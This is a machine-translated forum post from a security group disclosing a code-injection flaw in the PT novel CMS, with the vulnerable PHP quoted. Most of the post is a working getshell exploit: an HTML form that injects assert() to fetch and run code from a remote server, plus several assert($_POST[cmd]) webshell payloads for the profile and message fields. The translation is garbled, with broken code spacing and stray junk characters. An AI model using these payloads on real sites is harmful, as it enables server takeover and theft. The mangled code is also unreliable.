Ptcms PT novel thief PTNovelSteal arbitrary code written 0 day and repair

The pt novel system kills the version. Patch released officially! (Fuck !)
 
Let's get started with the following text: Here is our own communication platform, a technology sharing platform for all our 90sec members!
This set of program users do not use databases, and all user information is stored in the/data/user directory!
Create a folder based on the user name and write user registration parameters and user information in the folder. 90sec-Web Information Security Team
 
Code will not be read elsewhere, because it is similar! So. We only look at one representative:
/User/reg4.php
If (isset ($ _ POST ['dosubmit ']) {
Unset ($ _ POST ['dosubmit ']);
} Else {
Echo "<script> alert ('incorrect route! '); Location. href = 'reg. php'; </script> ";
Exit ();
}
 
Include '../inc/global. php ';
Include '../data/user. php ';
$ Username = $ _ POST ['username'];
Copy code
// Write data
$ Str = '<? Php '. "\ n ";
Foreach ($ _ POST as $ key => $ value ){
$ Str. = "\ $ key = '$ value'; \ n ";
}
$ Str. = "\ $ regdate = '". date ("Y-m-d"). "'; \ n ";
$ Str. = "?> ";
$ File = '../data/user/'. $ username. '/info. php ';
$ Result = $ pt-> writeto ($ file, $ str );
Copy code
...... Omitted
The above Code leaves only the most critical. Then we saw our lovely foreach.
Pass the POST value directly to the writeto function. Check the Code:
Common. class. php
// Generate html
Function writeto ($ filePath, $ content ){
Pt: createdir (dirname ($ filePath ));
$ Pt_html = fopen ($ filePath, 'w ');
Flock ($ pt_html, LOCK_EX );
$ Result = fwrite ($ pt_html, $ content );
Fclose ($ pt_html );
Return $ result;
}
 
// Generate a directory
Function createdir ($ dir ){
If (strpos ('\', $ dir )){
$ Dir = str_replace ('\', '/', $ dir );
}
$ Edir = explode ("/", $ dir );
For ($ I = 0; $ I <count ($ edir); $ I ++ ){
$ Edirm = $ edir [0];
For ($ ii = 1; $ ii <= $ I; $ ii ++ ){
$ Edirm = $ edirm. '/'. $ edir [$ ii];
}
If (file_exists ($ edirm) & is_dir ($ edirm )){
 
} Else {
@ Mkdir ($ edirm, 0777 );
}
}
}
Copy code
It's amazing. Write the PHP file directly. OK. Let's take a look at the usage.
First, we can directly ignore the road. This file does not have related filter functions! Let's call the file.
In Global. php
// Prevent invalid POST
If (! Empty ($ _ REQUEST )){
$ Value = implode ("", $ _ REQUEST );
If (preg_match ("/\ {| \} | fputs | fopen | base64 | eval/I", $ value) {// a keyword is added here for the patch. Of course, this vulnerability was not officially discovered to be bypassed!
Exit ('invalid operation ');
}
}
Copy code
Unrelated Code omitted. We can see that the Global filter is simple. Easy to bypass-Focus on Web Information Security 9 T, j) X7 L: c9 Q/S3 w1 l. Q4 g
Let's take a look at my EXP!
<Title> PT novel system Getshell Exploit by cfking </title>
<Form id = "QuickSearch" action = "" method = "post" name = "QuickSearch" onsubmit = "addaction ();">
Target address: <input style = "width: 400;" type = "text" name = "doaction" value = "http: // localhost/user/reg4.php"/>
<Input style = "width: 400;" type = "hidden" name = "dosubmit" value = "test"/>
Registered account: <input style = "width: 400;" type = "text" name = "cfking" value = "username"/>
Remote codes: <input style = "width: 400;" type = "text" name = "url" value = "http: // 110.110.110.110/xx.txt"/>
<Input style = "width: 400;" type = "hidden" name = "exp; assert (file_get_contents ($ url); //"/>
<Input type = "submit" name = "QuickSearchBtn" value = "submit" style = "font-size: 16px;"/>
</Form>
<Script type = "text/javascript">
Function addaction ()
{
Document. QuickSearch. action = document. QuickSearch. doaction. value;
}
</Script>
<Hr> <p> tip: After the get command is successful, the shell path is too powerful in/data/user name/info. php! Roar --! <P>
Enter eval ($ _ POST [cmd]) in the TXT text of the remote code.
<P>
Welcome to <a href = "http://www.bkjia.com/" title = "90sec Information Security Team"> www.2cto.com </a> Copy code
Another method is as follows:
After registering an account
Where can I insert www.2cto.com 'to modify my personal data?> <? Php assert ($ _ POST [cmd]);?> <? Php'
 
The shell path is in/data/user name/info.phpwww.2cto.com,
However, if GPC is enabled, it will fail. Next I will find another one!
Sending Short Messages. Writing the title or content is our own communication platform and a technology sharing platform for all our 90sec members!
<? Php assert ($ _ POST [cmd]);?>
You can win it directly.
Address pm. php

Www.2cto.com

Patch officially released